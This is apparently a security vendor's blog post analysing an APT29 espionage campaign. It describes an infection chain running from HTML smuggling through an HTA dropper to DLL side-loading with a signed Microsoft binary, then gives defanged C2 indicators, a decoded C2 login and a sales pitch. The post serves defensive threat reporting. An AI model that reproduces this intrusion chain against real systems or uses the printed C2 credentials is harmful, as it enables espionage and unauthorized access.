[Pipeline Research] Russian APT29 Uses Pakistani Site to Target Europe

In the ever-evolving landscape of cyber threats, advanced persistent threats (APTs) continue to pose significant challenges to global cybersecurity. One such notorious APT group is APT29, also known as "Cozy Bear". They are known for their sophisticated tactics and suspected ties to Russian intelligence agencies, APT29 has recently been making headlines for a new and cunning strategy – leveraging a Pakistani website to target Europe.

This blog explores how the Pipeline Research team discovered the intriguing tactics and history of APT29, shedding light on its operations, motivations, and potential implications of its latest move. Join us as we delve into the enigmatic world of APT29 and analyze how their actions have raised new concerns about cybersecurity on an international scale.

How APT29 Group Evolved

APT29 is a suspected Russian threat group, active since 2008. They are linked with the Russian government’s Foreign Intelligence Service (SVR). In 2015, they gained initial access to the Pentagon’s network via phishing and used the Hammertoss technique to use Twitter accounts for C2 communication.

In addition, APT29 breached Democratic National Committee servers in 2016, compromised three EU National Affairs ministries and a Washington D.C. based embassy of an EU nation state in 2019, and also distributed the SUNBURST malware attacking SolarWinds Orion software in 2020. APT29 usually targets technology, healthcare, education, government, energy, and finance sectors in the US and Europe.

Recently Pipeline, Inc. has observed a threat campaign possibly linked to APT29 where they used RedCap malware. Interestingly, the malware communicates with a Pakistani domain via the malware script, which seems to be compromised by APT29. The infection chain started from an HTML page, which downloads a ZIP file containing a HTA file.

Upon execution of the HTA file, one EXE file, two DLL files, and one PDF file are generated and the EXE is executed. Even the EXE file is a Microsoft-signed binary. If the malware is executed, it does other malicious activities by connecting with C2 domains. This time, APT29 is using AWS. The high-level infection chain is visualized by below figure-

Technical Investigation

APT29 starts the operation with a HTML file that contains a very long JavaScript array-

The array is then supplied to the Uint8Array() constructor to create an Uint8Array object. Which is saved as a ZIP file named ‘Invitation_Farewell_DE_EMB[.]zip’. And finally, the HTML file sends a GET request to a Pakistani domain with the value of window.location.pathname using the below code-

The above generated ZIP file contains an HTA file. It also contains a very long JavaScript array. A for loop is used to prepare that array’s value. Which is then saved as a DLL file named ‘mso.dll’ by ActiveXObject in the 'C:\windows\tasks' folder using the below code.

And the second DLL file is created using the same technique. Then an EXE file named ‘msoev[.]exe’ is created by ActiveXObject and saved in the 'C:\windows\tasks' folder. Then a single-page PDF file is generated where APT29 pretends to be ‘The Embassy of Germany’ to target European companies. The PDF looks like below-

Finally VBScript language is used to execute the EXE using WScript.Shell as below-

The EXE is Microsoft Signed Binary!

The EXE file name ‘msoEV.exe’ is a legitimate file’s name which is a part of the Microsoft Office Professional Plus 2016 program developed by Microsoft Corporation. And the generated EXE file is a signed binary of Microsoft. Here is the certificate of the EXE-

Even the 2 DLL files written by the HTA file are also saved with the name of DLLs that are used by Microsoft (although the DLL contents are changed and malicious). It looks like APT29 is exploiting DLL side loading alike technique.

After execution, it communicates with the below C2 domain-

toyy[.]zulipchat[.]com

In that communication, an encoded basic authorization is used. After decoding, we found the below username and password-

User: gabs-bot@toyy[.]zulipchat[.]com

Pass: xJZf8jaqwX54HWaliXfm4u2bMWCzNoLz

High Level TTP

We are still investigating and tracking the activities. Here we are providing a high level summarized TTPs of the malware activities-

• APT29 this time uses the ‘msoEV.exe’ Microsoft signed binary.
• Malware is written in the ‘C:\windows\tasks’ folder to make these persistent.
• The malware mostly collects user and system information.
• The malware do a process injection to make a system process to connect with network.
• The malware connects with 'ec2-52-202-201-139[.]compute-1[.]amazonaws[.]com' which indicates that APT29 is using AWS EC2 instance.
• The attack is geo based and the country code is checked from Windows Registry.
• Also downloads 2 files from ‘hxxps[://]crt[.]sectigo[.]com/’ domain.

Attribution

When the RedCap malware was detected, it seemed like the threat actor is APT34. As Trend Micro published a report on February 2023 where APT34 was linked with that RedCap malware activity. But, TTPs we found later were a bit different and related to APT29. Even, Cluster25 has linked the C2 communication of the domain 'toyy[.]zulipchat[.]com' to APT29 (details).

IOC List

C2: hxxps[://]sgrhf[.]org[.]pk/wp-content/idx[.]php

C2: ec2-52-202-201-139[.]compute-1[.]amazonaws[.]com

C2: toyy[.]zulipchat[.]com

Email Address: gabs-bot@toyy[.]zulipchat[.]com

MITRE ATT&CK

T1591: Gather Victim Org Information
T1585: Establish Accounts
T1588: Obtain Capabilities
T1608: Stage Capabilities
T1566: Phishing
T1083: File and Directory Discovery
T1217: Browser Information Discovery
T1012: Query Registry
T1614: System Location Discovery

Conclusion

The recent threat campaign possibly linked to APT29 showcases the group's continued sophistication and adaptability in carrying out cyber espionage activities.

Leveraging a Pakistani domain, APT29 has employed an intricate infection chain, utilizing legitimate Microsoft-signed binaries and DLL side loading techniques to remain undetected. Their choice to communicate with a Zulip chat domain hosted on AWS indicates a strategic shift in their tactics, making attribution and detection more challenging.

The attack's geo-based targeting, particularly towards European entities, raises concerns about the group's intent and the potential geopolitical implications. While attribution in the cyber realm can be complex, the identified TTPs and C2 communication patterns point to APT29's involvement, differentiating it from previous attributions to other threat actors.

How Pipeline Can Help You

As the threat landscape continues to evolve, it becomes imperative for organizations to remain vigilant against advanced cyber adversaries like APT29. Pipeline, Inc., a leading cybersecurity solutions provider, offers a range of services and tools to help you strengthen your defenses and protect against sophisticated attacks.

Threat Intelligence and Analysis: Pipeline's experts monitor and analyze the latest threat intelligence to provide real-time insights into emerging threats, including those associated with APT29. This enables proactive defense and timely response to potential attacks.

1. Incident Response and Forensics: In the event of a cyber incident, Pipeline's experienced incident response team can rapidly mobilize to investigate, contain, and mitigate the impact of the breach. Our digital forensics capabilities help identify the attack's scope and facilitate the recovery process.
2. Managed Detection and Response (MDR): With our MDR services, organizations can outsource their cybersecurity monitoring to Pipeline's dedicated team. We use advanced threat detection tools and 24/7 monitoring to identify and respond to potential threats effectively.
3. Security Assessments and Penetration Testing: Pipeline's comprehensive security assessments and penetration testing services help identify vulnerabilities and weaknesses in your infrastructure, applications, and personnel. This empowers you to proactively address potential entry points for attackers.
4. Security Awareness Training: Human error remains a common entry point for cyber attackers. Pipeline provides tailored security awareness training programs to educate your employees on best practices, reducing the risk of successful phishing and social engineering attacks.
5. Threat Hunting: Our proactive threat hunting services allow us to search for signs of malicious activity that may have evaded traditional security measures. This proactive approach enhances the likelihood of early threat detection and containment.

At Pipeline, we understand the dynamic nature of cyber threats and the critical importance of safeguarding your organization's assets and reputation. With our cutting-edge solutions and expertise, you can stay ahead of APT29 and other sophisticated threat actors, ensuring a resilient and secure cyber environment for your business.

Contact us today to discuss how Pipeline can tailor a comprehensive cybersecurity strategy to meet your organization's specific needs and challenges. Safeguard your digital assets with confidence and stay one step ahead of the ever-evolving cyber threats.